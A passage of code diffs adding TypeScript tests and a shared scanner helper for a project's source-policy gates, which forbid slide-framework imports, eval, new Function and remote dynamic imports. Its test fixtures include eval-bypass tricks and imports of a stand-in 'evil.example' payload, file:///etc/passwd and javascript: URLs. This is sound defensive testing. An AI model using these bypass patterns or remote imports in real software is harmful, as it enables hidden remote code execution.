+      const src = "import { thing } from 'spectacle-companion';";
+      expect(scanForA006(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+
+    it('honors `// PUL-A006-allow: <reason>` exemption on the import line', () => {
+      const src =
+        "import Reveal from 'reveal.js'; // PUL-A006-allow: documented adapter shim, ADR-001";
+      expect(scanForA006(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('runtime-core file set is non-empty', () => {
+      expect(runtimeCoreFiles().length).toBeGreaterThan(0);
+    });
+
+    it('contains no A006 violations across the runtime-core file set', () => {
+      const files = runtimeCoreFiles();
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        const exempted = collectLineExemptions(sf, RULE.allowTag);
+        findings.push(...scanImportSpecifiers(sf, RULE, exempted));
+      }
+      const header =
+        'PUL-A006 forbids the runtime core from importing slide-framework primitives (reveal.js, Spectacle). Slide frameworks belong in companion projects (ADR-001). Add a `// PUL-A006-allow: <reason>` exemption on the same line if the use is intentional.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+  });
+});

--- a/tests/runtime/policy-a006-slide-frameworks.test.ts
+++ b/tests/runtime/policy-a006-slide-frameworks.test.ts
@@ -46,17 +46,18 @@ function scanForA006(source: string, file: string): readonly SourceFinding[] {
 describe('PUL-A006 — live runtime independent of slide frameworks (source scan)', () => {
   describe('scanner self-tests', () => {
     it.each([
-      ["import Reveal from 'reveal.js';"],
-      ["import 'reveal.js/dist/reveal.css';"],
-      ["import { Deck, Slide } from 'spectacle';"],
-      ["import * as Spectacle from 'spectacle';"],
-      ["import { Theme } from '@spectacle/theme';"],
-      ["await import('reveal.js');"],
-      ["import type { Options } from 'reveal.js';"],
-      ["export * from 'spectacle';"],
-    ])('flags %s in runtime core', (source) => {
+      ["import Reveal from 'reveal.js';", '(static import)'],
+      ["import 'reveal.js/dist/reveal.css';", '(static import)'],
+      ["import { Deck, Slide } from 'spectacle';", '(static import)'],
+      ["import * as Spectacle from 'spectacle';", '(static import)'],
+      ["import { Theme } from '@spectacle/theme';", '(static import)'],
+      ["await import('reveal.js');", '(dynamic import)'],
+      ["import type { Options } from 'reveal.js';", '(type-only import)'],
+      ["export * from 'spectacle';", '(re-export)'],
+    ])('flags `%s` %s in runtime core', (source, suffix) => {
       const findings = scanForA006(source, 'src/runtime/example.ts');
       expect(findings).toHaveLength(1);
+      expect(findings[0]?.label).toBe(`${RULE.label} ${suffix}`);
     });
 
     it('does NOT flag a similarly-named package (whole-specifier match)', () => {
@@ -79,6 +80,17 @@ describe('PUL-A006 — live runtime independent of slide frameworks (source scan
   describe('runtime tree (current code revision)', () => {
     it('runtime-core file set is non-empty', () => {
       expect(runtimeCoreFiles().length).toBeGreaterThan(0);
+    });
+
+    it('runtime-core file set excludes `src/scenes/`', () => {
+      // Pins the scope filter so a regression that removed or
+      // inverted the filter would fail here instead of silently
+      // widening the scan. No scene currently imports a slide
+      // framework, so without this assertion the "contains no
+      // violations" check alone would not catch the scope drift.
+      const files = runtimeCoreFiles();
+      const scenePaths = files.filter((f) => f.startsWith(`${SCENES_ROOT}/`));
+      expect(scenePaths).toEqual([]);
     });
 
     it('contains no A006 violations across the runtime-core file set', () => {

--- a/tests/runtime/policy-q007-remote-code-execution.test.ts
+++ b/tests/runtime/policy-q007-remote-code-execution.test.ts
@@ -188,13 +188,23 @@ describe('PUL-Q007 — no remote code execution (source scan)', () => {
     });
 
     describe('global-wrapper forms', () => {
+      // Every entry in `GLOBAL_WRAPPERS` (`globalThis`, `window`, `self`,
+      // `global`) must appear at least once for both `eval` and
+      // `Function` so a regression that drops one wrapper from the set
+      // fails here. Without `global` coverage, a Node.js-adjacent
+      // runtime would bypass the gate with `global.eval(payload)` /
+      // `new global.Function(code)` while every existing test stayed
+      // green.
       it.each([
         ['eval (global wrapper)', "globalThis.eval('1+2');"],
         ['eval (global wrapper)', "window.eval('1+2');"],
         ['eval (global wrapper)', "self.eval('1+2');"],
+        ['eval (global wrapper)', "global.eval('1+2');"],
         ['eval (global wrapper)', "globalThis['eval']('1+2');"],
         ['Function (global wrapper)', "new globalThis.Function('return 1');"],
         ['Function (global wrapper)', "window.Function('a', 'return a');"],
+        ['Function (global wrapper)', "self.Function('a', 'return a');"],
+        ['Function (global wrapper)', "new global.Function('return 1');"],
         ['Function (global wrapper)', "globalThis['Function']('return 1');"],
       ])('flags %s — %s', (label, source) => {
         const findings = findingsOf(source);
@@ -203,11 +213,16 @@ describe('PUL-Q007 — no remote code execution (source scan)', () => {
     });
 
     describe('computed global wrapper access (bypass defense)', () => {
+      // Same per-wrapper coverage discipline as the literal-subscript
+      // group above: every entry in `GLOBAL_WRAPPERS` is exercised at
+      // least once here so a regression that drops one (especially
+      // `global`, a Node.js-adjacent bypass surface) fails this group.
       it.each([
         "globalThis['ev' + 'al']('payload');",
         "window['Fun' + 'ction']('return 1');",
-        "globalThis[someKey]('payload');",
         "self[`ev${'al'}`]('payload');",
+        "global['ev' + 'al']('payload');",
+        "globalThis[someKey]('payload');",
         "globalThis[(condition ? 'eval' : 'noop')]('payload');",
       ])('flags computed wrapper access — `%s`', (source) => {
         const findings = findingsOf(

--- a/tests/runtime/policy-q007-remote-code-execution.test.ts
+++ b/tests/runtime/policy-q007-remote-code-execution.test.ts
@@ -379,17 +379,28 @@ describe('PUL-Q007 — no remote code execution (source scan)', () => {
       });
 
       it('does NOT flag `obj.eval` where `obj` is a non-global local', () => {
+        // Assert the FULL findings list is empty (not just the
+        // global-wrapper label). If `isPropertyNamePosition` regressed
+        // and started returning false, `eval` in `obj.eval(...)` would
+        // be recorded as `'eval (value read)'` — a different label
+        // that `.not.toContain('eval (global wrapper)')` would still
+        // pass. The empty-list assertion catches every possible
+        // mis-label for the same site.
         const findings = findingsOf(
           'declare const obj: { eval: (input: string) => unknown }; obj.eval("1+2");',
         );
-        expect(findings.map((f) => f.label)).not.toContain('eval (global wrapper)');
+        expect(findings).toEqual([]);
       });
 
       it('does NOT flag `obj.Function` where `obj` is a non-global local', () => {
+        // Same belt-and-braces shape as the `obj.eval` test above:
+        // assert the full findings list is empty so a regression in
+        // `isPropertyNamePosition` or related identifier classification
+        // cannot escape via a different label.
         const findings = findingsOf(
           'declare const obj: { Function: (a: string) => unknown }; obj.Function("a");',
         );
-        expect(findings.map((f) => f.label)).not.toContain('Function (global wrapper)');
+        expect(findings).toEqual([]);
       });
 
       it('does NOT flag the legitimate `import.meta` access (it is not `import()`)', () => {

--- a/tests/runtime/policy-q007-remote-code-execution.test.ts
+++ b/tests/runtime/policy-q007-remote-code-execution.test.ts
@@ -279,6 +279,31 @@ describe('PUL-Q007 — no remote code execution (source scan)', () => {
         expect(findings).toEqual([]);
       });
 
+      it('does NOT flag a no-substitution template-literal dynamic import of a local module', () => {
+        // `import(`./module`)` is a NoSubstitutionTemplateLiteral whose
+        // cooked value resolves to a relative path. The classifier
+        // strips it through the same static-string path as a regular
+        // string-literal local. Pinning the template-literal branch
+        // explicitly so a regression that drops the
+        // `isNoSubstitutionTemplateLiteral` arm of
+        // `classifyImportSpecifier` (`source-policy.ts`) fails here.
+        const findings = findingsOf('await import(`./module.js`);');
+        expect(findings).toEqual([]);
+      });
+
+      it('does NOT flag a no-substitution template-literal dynamic import of a package', () => {
+        const findings = findingsOf('await import(`howler`);');
+        expect(findings).toEqual([]);
+      });
+
+      it('flags a no-substitution template-literal dynamic import of a remote URL', () => {
+        // Same NoSubstitutionTemplateLiteral classifier path as the
+        // tests above, but the cooked value is a remote URL. The
+        // classifier must still route it to `static-remote-url`.
+        const findings = findingsOf('await import(`https://evil.example/payload.js`);');
+        expect(findings.map((f) => f.label)).toContain('dynamic import of remote URL');
+      });
+
       it.each([
         ['data:', "import('data:text/javascript,console.log(1)');"],
         ['blob:', "import('blob:https://example.com/abc-123');"],

--- a/tests/runtime/policy-q007-remote-code-execution.test.ts
+++ b/tests/runtime/policy-q007-remote-code-execution.test.ts
@@ -1,0 +1,459 @@
+import { readFileSync, statSync } from 'node:fs';
+import { relative } from 'node:path';
+import * as ts from 'typescript';
+import { describe, expect, it } from 'vitest';
+
+import {
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  classifyImportSpecifier,
+  collectLineExemptions,
+  getAccessPath,
+  isComputedGlobalWrapperAccess,
+  isDynamicImportCall,
+  isInTypePosition,
+  lineText,
+  parseSource,
+  pathResolvesTo,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-Q007 — no remote code execution.
+//
+// Statement: "The runtime SHALL NOT use `eval`, `new Function`,
+// dynamic `import()` of remote URLs at runtime, or any equivalent
+// mechanism that would execute code not present in the published
+// bundle."
+//
+// Enforcement: a Vitest source scan over `src/**/*.ts`. The scanner
+// flags every runtime-value reference to `eval` / `Function` and
+// every dynamic `import(...)` whose specifier is a remote URL or a
+// non-static expression. Type-position references (interface members
+// named `eval`, `typeof eval` in a type alias, JSDoc
+// `{@link import('./mod').T}`) are intentionally NOT flagged — they
+// are compile-time artifacts and do not execute code at runtime.
+//
+// Exemption: a line-scoped `// PUL-Q007-allow: <reason>` marker
+// excludes a single line from the scan. Empty / whitespace-only
+// rationales are rejected; markers hidden inside string literals are
+// rejected; the marker applies only to its own line.
+
+const ALLOW_TAG = 'PUL-Q007-allow';
+
+interface Q007Finding extends SourceFinding {}
+
+function findingsOf(source: string, file = 'fake.ts'): readonly Q007Finding[] {
+  const sf = parseSource(source, file);
+  return scanQ007(sf);
+}
+
+// True when `node` is the `.name` portion of a property access /
+// qualified name — i.e., a key position rather than a value-read.
+function isPropertyNamePosition(node: ts.Identifier): boolean {
+  const parent = node.parent;
+  if (!parent) return false;
+  if (
+    (ts.isPropertyAccessExpression(parent) || ts.isQualifiedName(parent)) &&
+    'name' in parent &&
+    parent.name === node
+  ) {
+    return true;
+  }
+  return false;
+}
+
+// True when `node` is being declared (`const eval = ...`,
+// `function eval() {}`, `interface I { eval(): void }`, etc.).
+function isDeclarationName(node: ts.Identifier): boolean {
+  const parent = node.parent;
+  if (!parent) return false;
+  if (ts.isVariableDeclaration(parent) && parent.name === node) return true;
+  if (ts.isParameter(parent) && parent.name === node) return true;
+  if (ts.isFunctionDeclaration(parent) && parent.name === node) return true;
+  if (ts.isClassDeclaration(parent) && parent.name === node) return true;
+  if (ts.isInterfaceDeclaration(parent) && parent.name === node) return true;
+  if (ts.isTypeAliasDeclaration(parent) && parent.name === node) return true;
+  if (ts.isEnumDeclaration(parent) && parent.name === node) return true;
+  if (ts.isEnumMember(parent) && parent.name === node) return true;
+  if (ts.isMethodDeclaration(parent) && parent.name === node) return true;
+  if (ts.isMethodSignature(parent) && parent.name === node) return true;
+  if (ts.isPropertyDeclaration(parent) && parent.name === node) return true;
+  if (ts.isPropertySignature(parent) && parent.name === node) return true;
+  if (ts.isPropertyAssignment(parent) && parent.name === node) return true;
+  if (ts.isBindingElement(parent) && parent.name === node) return true;
+  if (ts.isImportSpecifier(parent)) return true;
+  if (ts.isImportClause(parent) && parent.name === node) return true;
+  if (ts.isNamespaceImport(parent)) return true;
+  if (ts.isExportSpecifier(parent)) return true;
+  return false;
+}
+
+function scanQ007(sourceFile: ts.SourceFile): readonly Q007Finding[] {
+  const exempted = collectLineExemptions(sourceFile, ALLOW_TAG);
+  const findings: Q007Finding[] = [];
+  const seen = new Set<string>();
+
+  const record = (node: ts.Node, label: string): void => {
+    const start = node.getStart(sourceFile);
+    const key = `${start}::${label}`;
+    if (seen.has(key)) return;
+    seen.add(key);
+    const { line } = sourceFile.getLineAndCharacterOfPosition(start);
+    if (exempted.has(line)) return;
+    findings.push({
+      file: sourceFile.fileName,
+      line: line + 1,
+      text: lineText(sourceFile, line).trim(),
+      label,
+    });
+  };
+
+  const visit = (node: ts.Node): void => {
+    // 1. Identifier reads: bare `eval` / `Function` in a value
+    //    position. We use `isInTypePosition` to skip TypeScript type
+    //    annotations (`(fn: Function) => void`, `typeof eval`),
+    //    `isDeclarationName` to skip the binding site, and
+    //    `isPropertyNamePosition` to skip the `.name` of a member
+    //    expression.
+    if (ts.isIdentifier(node) && !isInTypePosition(node) && !isDeclarationName(node)) {
+      if (!isPropertyNamePosition(node)) {
+        if (node.text === 'eval') record(node, 'eval (value read)');
+        if (node.text === 'Function') record(node, 'Function (value read)');
+      }
+    }
+
+    // 2. `<global-wrapper>.eval` / `<global-wrapper>.Function` access
+    //    chains. Resolved through `getAccessPath` so wrappers and
+    //    string-subscript bracket access (`globalThis['eval']`) are
+    //    covered. A computed subscript on a global wrapper
+    //    (`globalThis['ev' + 'al']`) is conservatively flagged via
+    //    `isComputedGlobalWrapperAccess` — it cannot be resolved
+    //    statically and is exactly the bypass pattern an attacker
+    //    would use to hide an `eval` / `Function` access.
+    if (ts.isPropertyAccessExpression(node) || ts.isElementAccessExpression(node)) {
+      if (!isInTypePosition(node)) {
+        const path = getAccessPath(node);
+        if (path) {
+          if (pathResolvesTo(path, 'eval')) record(node, 'eval (global wrapper)');
+          if (pathResolvesTo(path, 'Function')) record(node, 'Function (global wrapper)');
+        } else if (isComputedGlobalWrapperAccess(node)) {
+          record(node, 'computed global wrapper access (possible eval / Function bypass)');
+        }
+      }
+    }
+
+    // 3. Dynamic `import(specifier)` — flag when specifier is a
+    //    remote URL or a non-static expression. Static-local-package
+    //    specifiers are allowed (`import('./module')`, `import('howler')`).
+    if (isDynamicImportCall(node) && !isInTypePosition(node)) {
+      const arg = node.arguments[0];
+      if (arg) {
+        const kind = classifyImportSpecifier(arg);
+        if (kind === 'static-remote-url') {
+          record(node, 'dynamic import of remote URL');
+        } else if (kind === 'non-static') {
+          record(node, 'dynamic import of non-static specifier');
+        }
+      } else {
+        // `import()` with no arguments is malformed code; flag it
+        // generously so a future refactor that strips the arg doesn't
+        // accidentally clear the gate.
+        record(node, 'dynamic import without specifier');
+      }
+    }
+
+    ts.forEachChild(node, visit);
+  };
+  visit(sourceFile);
+  return findings;
+}
+
+// --- Tests -----------------------------------------------------------
+
+describe('PUL-Q007 — no remote code execution (source scan)', () => {
+  describe('scanner self-tests', () => {
+    describe('direct constructions', () => {
+      it.each([
+        ['eval (value read)', "eval('1+2');"],
+        ['eval (value read)', 'const e = eval;'],
+        ['eval (value read)', "(0, eval)('1+2');"],
+        ['Function (value read)', "new Function('return 1');"],
+        ['Function (value read)', "Function('a', 'return a');"],
+        ['Function (value read)', 'const F = Function;'],
+      ])('flags %s — %s', (label, source) => {
+        const findings = findingsOf(source);
+        expect(findings.map((f) => f.label)).toContain(label);
+      });
+    });
+
+    describe('global-wrapper forms', () => {
+      it.each([
+        ['eval (global wrapper)', "globalThis.eval('1+2');"],
+        ['eval (global wrapper)', "window.eval('1+2');"],
+        ['eval (global wrapper)', "self.eval('1+2');"],
+        ['eval (global wrapper)', "globalThis['eval']('1+2');"],
+        ['Function (global wrapper)', "new globalThis.Function('return 1');"],
+        ['Function (global wrapper)', "window.Function('a', 'return a');"],
+        ['Function (global wrapper)', "globalThis['Function']('return 1');"],
+      ])('flags %s — %s', (label, source) => {
+        const findings = findingsOf(source);
+        expect(findings.map((f) => f.label)).toContain(label);
+      });
+    });
+
+    describe('computed global wrapper access (bypass defense)', () => {
+      it.each([
+        "globalThis['ev' + 'al']('payload');",
+        "window['Fun' + 'ction']('return 1');",
+        "globalThis[someKey]('payload');",
+        "self[`ev${'al'}`]('payload');",
+        "globalThis[(condition ? 'eval' : 'noop')]('payload');",
+      ])('flags computed wrapper access — `%s`', (source) => {
+        const findings = findingsOf(
+          `declare const someKey: string; declare const condition: boolean; ${source}`,
+        );
+        expect(findings.map((f) => f.label)).toContain(
+          'computed global wrapper access (possible eval / Function bypass)',
+        );
+      });
+
+      it('does NOT flag computed access on a non-global root', () => {
+        const findings = findingsOf(
+          "declare const obj: Record<string, (s: string) => unknown>; declare const k: string; obj[k]('x');",
+        );
+        expect(findings).toEqual([]);
+      });
+
+      it('does NOT flag string-literal subscript on a global wrapper (already handled by the literal path)', () => {
+        // `globalThis['eval']` is a literal subscript: getAccessPath
+        // resolves it cleanly and the `eval (global wrapper)` finding
+        // fires. The computed-access detector must NOT also fire,
+        // otherwise the same line would carry two findings.
+        const findings = findingsOf("globalThis['eval']('1+2');");
+        const labels = findings.map((f) => f.label);
+        expect(labels).toContain('eval (global wrapper)');
+        expect(labels).not.toContain(
+          'computed global wrapper access (possible eval / Function bypass)',
+        );
+      });
+    });
+
+    describe('dynamic import', () => {
+      it.each([
+        ['dynamic import of remote URL', "import('https://evil.example/payload.js');"],
+        ['dynamic import of remote URL', "import('http://localhost/x.js');"],
+        ['dynamic import of remote URL', "import('//cdn.example/x.js');"],
+        ['dynamic import of non-static specifier', 'declare const url: string; import(url);'],
+        [
+          'dynamic import of non-static specifier',
+          'declare const name: string; import(`./${name}.js`);',
+        ],
+      ])('flags %s — %s', (label, source) => {
+        const findings = findingsOf(source);
+        expect(findings.map((f) => f.label)).toContain(label);
+      });
+
+      it('does NOT flag a static local dynamic import', () => {
+        const findings = findingsOf("import('./module.js');");
+        expect(findings).toEqual([]);
+      });
+
+      it('does NOT flag a static package-name dynamic import', () => {
+        const findings = findingsOf("import('howler');");
+        expect(findings).toEqual([]);
+      });
+
+      it.each([
+        ['data:', "import('data:text/javascript,console.log(1)');"],
+        ['blob:', "import('blob:https://example.com/abc-123');"],
+        ['file:', "import('file:///etc/passwd');"],
+        ['node:', "import('node:fs');"],
+        ['absolute filesystem path', "import('/absolute/payload.js');"],
+        ['chrome-extension:', "import('chrome-extension://abc/payload.js');"],
+        ['javascript:', "import('javascript:alert(1)');"],
+      ])('flags non-http URL scheme (%s)', (_label, source) => {
+        const findings = findingsOf(source);
+        expect(findings.map((f) => f.label)).toContain('dynamic import of remote URL');
+      });
+
+      it('flags an empty-string dynamic import specifier', () => {
+        // An empty string is not a valid local path or package name;
+        // any path resolution would be runtime-determined, which is
+        // exactly the surprise-execution-path hazard Q007 forbids.
+        const findings = findingsOf("import('');");
+        expect(findings.map((f) => f.label)).toContain('dynamic import of remote URL');
+      });
+
+      it('does NOT flag a scoped-package specifier (`@scope/pkg`)', () => {
+        const findings = findingsOf("import('@spectacle/theme');");
+        expect(findings).toEqual([]);
+      });
+    });
+
+    describe('TypeScript wrapper unwrapping', () => {
+      it('flags `(eval)("...")`', () => {
+        const findings = findingsOf("(eval)('1+2');");
+        expect(findings.map((f) => f.label)).toContain('eval (value read)');
+      });
+
+      it('flags `(globalThis as any).eval`', () => {
+        const findings = findingsOf("(globalThis as any).eval('1+2');");
+        expect(findings.map((f) => f.label)).toContain('eval (global wrapper)');
+      });
+
+      it('flags `import(("https://x" as string))`', () => {
+        const findings = findingsOf(`import(('https://evil.example/x.js' as string));`);
+        expect(findings.map((f) => f.label)).toContain('dynamic import of remote URL');
+      });
+    });
+
+    describe('false-positive defense', () => {
+      it('does NOT flag JSDoc `{@link import("./path").Symbol}` (type-position)', () => {
+        const src = [
+          '/**',
+          " * Foo is {@link import('./mod').Bar}.",
+          ' */',
+          'export type Foo = number;',
+        ].join('\n');
+        expect(findingsOf(src)).toEqual([]);
+      });
+
+      it('does NOT flag a `(fn: Function) => void` type annotation', () => {
+        const findings = findingsOf('export const wrap = (fn: Function): void => fn();');
+        expect(findings.map((f) => f.label)).not.toContain('Function (value read)');
+      });
+
+      it('does NOT flag `typeof eval` in a type alias', () => {
+        const findings = findingsOf('type Eval = typeof eval;');
+        expect(findings.map((f) => f.label)).not.toContain('eval (value read)');
+      });
+
+      it('does NOT flag the property name `eval` in a property assignment', () => {
+        const findings = findingsOf('const obj = { eval: 1 };');
+        expect(findings.map((f) => f.label)).not.toContain('eval (value read)');
+      });
+
+      it('does NOT flag the property name `Function` in a property assignment', () => {
+        const findings = findingsOf('const obj = { Function: 1 };');
+        expect(findings.map((f) => f.label)).not.toContain('Function (value read)');
+      });
+
+      it('does NOT flag a method named `eval` on a class', () => {
+        const findings = findingsOf('class C { eval() {} }');
+        expect(findings.map((f) => f.label)).not.toContain('eval (value read)');
+      });
+
+      it('does NOT flag an interface member named `eval`', () => {
+        const findings = findingsOf('interface I { eval(input: string): unknown; }');
+        expect(findings.map((f) => f.label)).not.toContain('eval (value read)');
+      });
+
+      it('does NOT flag forbidden vocabulary inside a `//` comment', () => {
+        expect(findingsOf('// eval and new Function are forbidden')).toEqual([]);
+      });
+
+      it('does NOT flag forbidden vocabulary inside a `/* */` block comment', () => {
+        const src = '/* eval, new Function, dynamic import. */ const x = 1;';
+        expect(findingsOf(src)).toEqual([]);
+      });
+
+      it('does NOT flag `eval` inside a string literal', () => {
+        const findings = findingsOf("const note = 'eval is forbidden';");
+        expect(findings).toEqual([]);
+      });
+
+      it('does NOT flag `obj.eval` where `obj` is a non-global local', () => {
+        const findings = findingsOf(
+          'declare const obj: { eval: (input: string) => unknown }; obj.eval("1+2");',
+        );
+        expect(findings.map((f) => f.label)).not.toContain('eval (global wrapper)');
+      });
+
+      it('does NOT flag `obj.Function` where `obj` is a non-global local', () => {
+        const findings = findingsOf(
+          'declare const obj: { Function: (a: string) => unknown }; obj.Function("a");',
+        );
+        expect(findings.map((f) => f.label)).not.toContain('Function (global wrapper)');
+      });
+
+      it('does NOT flag the legitimate `import.meta` access (it is not `import()`)', () => {
+        const findings = findingsOf('const v = (import.meta as { url: string }).url;');
+        expect(findings).toEqual([]);
+      });
+    });
+
+    describe('exemption marker', () => {
+      it('honors `// PUL-Q007-allow: <reason>` on the same line', () => {
+        const findings = findingsOf("eval('audit-only'); // PUL-Q007-allow: documented audit shim");
+        expect(findings).toEqual([]);
+      });
+
+      it('rejects an empty rationale', () => {
+        const findings = findingsOf("eval('x'); // PUL-Q007-allow:");
+        expect(findings.map((f) => f.label)).toContain('eval (value read)');
+      });
+
+      it('rejects a whitespace-only rationale', () => {
+        const findings = findingsOf("eval('x'); // PUL-Q007-allow:   ");
+        expect(findings.map((f) => f.label)).toContain('eval (value read)');
+      });
+
+      it('rejects a marker hidden inside a string literal', () => {
+        const findings = findingsOf(`const note = "// PUL-Q007-allow: hidden"; eval('x');`);
+        expect(findings.map((f) => f.label)).toContain('eval (value read)');
+      });
+
+      it('does NOT honor a marker on a different line (line-scoped)', () => {
+        const src = "// PUL-Q007-allow: see above\neval('x');";
+        const findings = findingsOf(src);
+        expect(findings).toHaveLength(1);
+        expect(findings[0]?.line).toBe(2);
+      });
+    });
+
+    describe('reporting', () => {
+      it('reports the 1-based line and file path on every finding', () => {
+        const src = "const a = 1;\nconst b = 2;\neval('x');\nconst c = 3;";
+        const findings = findingsOf(src, 'src/runtime/example.ts');
+        expect(findings).toHaveLength(1);
+        expect(findings[0]).toMatchObject({
+          file: 'src/runtime/example.ts',
+          line: 3,
+          label: 'eval (value read)',
+        });
+      });
+
+      it('reports findings across multiple lines independently', () => {
+        const src = "eval('x');\nnew Function('return 1');";
+        const findings = findingsOf(src);
+        expect(findings).toHaveLength(2);
+        expect(findings[0]?.line).toBe(1);
+        expect(findings[1]?.line).toBe(2);
+      });
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('scan root `src/` exists and contains at least one .ts file', () => {
+      expect(statSync(SRC_ROOT).isDirectory()).toBe(true);
+      expect(walkTsFiles(SRC_ROOT).length).toBeGreaterThan(0);
+    });
+
+    it('contains no Q007 violations across `src/**/*.ts`', () => {
+      const files = walkTsFiles(SRC_ROOT);
+      const findings: Q007Finding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        findings.push(...scanQ007(sf));
+      }
+      const header =
+        'PUL-Q007 forbids `eval`, `new Function`, dynamic `import()` of remote URLs or non-static specifiers in runtime source. Add a `// PUL-Q007-allow: <reason>` exemption on the same line if the use is intentional and CSP-compatible.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+  });
+});

--- a/tests/runtime/source-policy.ts
+++ b/tests/runtime/source-policy.ts
@@ -1,0 +1,529 @@
+// Shared helpers for the PUL-Q007 / PUL-A001..A006 source-policy gates.
+//
+// The seven runtime-policy bans (#46 + #50..#55) share one enforcement
+// shape: a Vitest source scan over `src/**/*.ts` that flags forbidden
+// constructions (Q007 — `eval`, `new Function`, remote dynamic
+// `import()`) or forbidden module specifiers in a given file-scope
+// (A001..A004, A006). PUL-A005 is the composition-declarativeness
+// check; it reuses the AST helpers below for top-level-statement
+// classification but supplies its own decision.
+//
+// This file is the shared seam the preflights authorized:
+// `docs/design/pul-q007-runtime-code-execution-preflight.md`:
+//   "the shared seam should be a forbidden-surface table plus matcher
+//   helpers. Keep the scanner generic enough that the A-series import
+//   bans can add policy tables without duplicating the walker or
+//   diagnostics."
+//
+// It is intentionally a `.ts` helper (NOT a `.test.ts`) so vitest's
+// glob (`tests/**/*.test.ts`) does not try to run it as a suite. Each
+// per-policy test file imports from here.
+
+import { readdirSync, statSync } from 'node:fs';
+import { isAbsolute, join, relative } from 'node:path';
+import { fileURLToPath } from 'node:url';
+import * as ts from 'typescript';
+
+// --- Finding shape ----------------------------------------------------
+
+export interface SourceFinding {
+  readonly file: string; // path relative to the repo root
+  readonly line: number; // 1-based
+  readonly text: string; // trimmed source line (no AST dumps, no raw blobs)
+  readonly label: string; // policy-defined short label
+}
+
+// --- Filesystem driver ------------------------------------------------
+
+export const REPO_ROOT = fileURLToPath(new URL('../..', import.meta.url));
+export const SRC_ROOT = join(REPO_ROOT, 'src');
+
+/**
+ * Walk a directory recursively, returning every `.ts` file found.
+ * Skips dotfiles (e.g., `.DS_Store`, `.gitignore`). Generated trees
+ * (`coverage/`, `dist/`) live OUTSIDE the scanned root, so they are
+ * out of scope by construction.
+ */
+export function walkTsFiles(root: string, excludes: readonly string[] = []): string[] {
+  const isExcluded = (absolutePath: string): boolean => {
+    const rel = relative(REPO_ROOT, absolutePath);
+    return excludes.some((ex) => rel === ex || rel.startsWith(`${ex}/`));
+  };
+  const out: string[] = [];
+  for (const entry of readdirSync(root)) {
+    if (entry.startsWith('.')) continue;
+    const full = join(root, entry);
+    const st = statSync(full);
+    if (st.isDirectory()) {
+      out.push(...walkTsFiles(full, excludes));
+    } else if (st.isFile() && entry.endsWith('.ts')) {
+      if (!isExcluded(full)) out.push(full);
+    }
+  }
+  return out;
+}
+
+// --- AST helpers ------------------------------------------------------
+
+/**
+ * Strip TypeScript wrappers that do not change the runtime value:
+ * parentheses, `as` assertions, legacy `<T>x` type assertions, non-null
+ * `!`, and `satisfies`. Used so policies that match an underlying
+ * expression shape (e.g., dynamic `import(...)` argument) don't slip
+ * past when a refactor adds a wrapper.
+ */
+export function unwrap(node: ts.Expression): ts.Expression {
+  let current: ts.Expression = node;
+  while (true) {
+    if (
+      ts.isParenthesizedExpression(current) ||
+      ts.isAsExpression(current) ||
+      ts.isTypeAssertionExpression(current) ||
+      ts.isNonNullExpression(current) ||
+      ts.isSatisfiesExpression(current)
+    ) {
+      current = current.expression;
+      continue;
+    }
+    return current;
+  }
+}
+
+/**
+ * Return true when `node` lives in a TypeScript type position. The
+ * policy gates only flag value-position constructions; an
+ * `import('./mod').Type` reference inside a `TypeReferenceNode`, an
+ * `interface` body member name, or a `typeof X` annotation is a
+ * compile-time-only artifact and is not a runtime-policy violation.
+ */
+export function isInTypePosition(node: ts.Node): boolean {
+  let n: ts.Node | undefined = node.parent;
+  while (n) {
+    if (
+      ts.isTypeNode(n) ||
+      ts.isTypeAliasDeclaration(n) ||
+      ts.isInterfaceDeclaration(n) ||
+      ts.isTypeReferenceNode(n) ||
+      ts.isTypeLiteralNode(n) ||
+      ts.isImportTypeNode(n)
+    ) {
+      return true;
+    }
+    n = n.parent;
+  }
+  return false;
+}
+
+/**
+ * Read the 0-indexed line `lineIndex0` from the source file's text and
+ * return it trimmed. Used for the bounded line-text portion of a
+ * finding; never expand to surrounding context.
+ */
+export function lineText(sourceFile: ts.SourceFile, lineIndex0: number): string {
+  const lines = sourceFile.text.split('\n');
+  return lines[lineIndex0] ?? '';
+}
+
+/**
+ * Build a `ts.SourceFile` with parent pointers populated so type-
+ * position and parent-shape predicates work.
+ */
+export function parseSource(text: string, file: string): ts.SourceFile {
+  return ts.createSourceFile(file, text, ts.ScriptTarget.Latest, /*setParentNodes=*/ true);
+}
+
+// --- Line-scoped exemption parser -------------------------------------
+
+/**
+ * Collect every 0-indexed line that carries a single-line comment
+ * matching `// <allowTag>: <non-empty reason>`. A marker hidden inside
+ * a string literal is NOT honored — the TypeScript scanner classifies
+ * tokens, so we only see the marker text on actual comment tokens.
+ *
+ * Each per-policy file passes its own `allowTag` (e.g., `PUL-Q007-allow`).
+ * Reuse for line-scoping discipline: a broad file-level allowlist is
+ * intentionally NOT supported.
+ */
+export function collectLineExemptions(sourceFile: ts.SourceFile, allowTag: string): Set<number> {
+  // Build the regex once per call to keep the helper pure of policy
+  // state. `\\S` requires at least one non-whitespace character after
+  // the colon so empty / whitespace-only rationales are rejected.
+  const escaped = allowTag.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
+  const re = new RegExp(`${escaped}:\\s*\\S`);
+  const exempted = new Set<number>();
+  const text = sourceFile.text;
+  const scanner = ts.createScanner(
+    ts.ScriptTarget.Latest,
+    /*skipTrivia=*/ false,
+    ts.LanguageVariant.Standard,
+    text,
+  );
+  let token = scanner.scan();
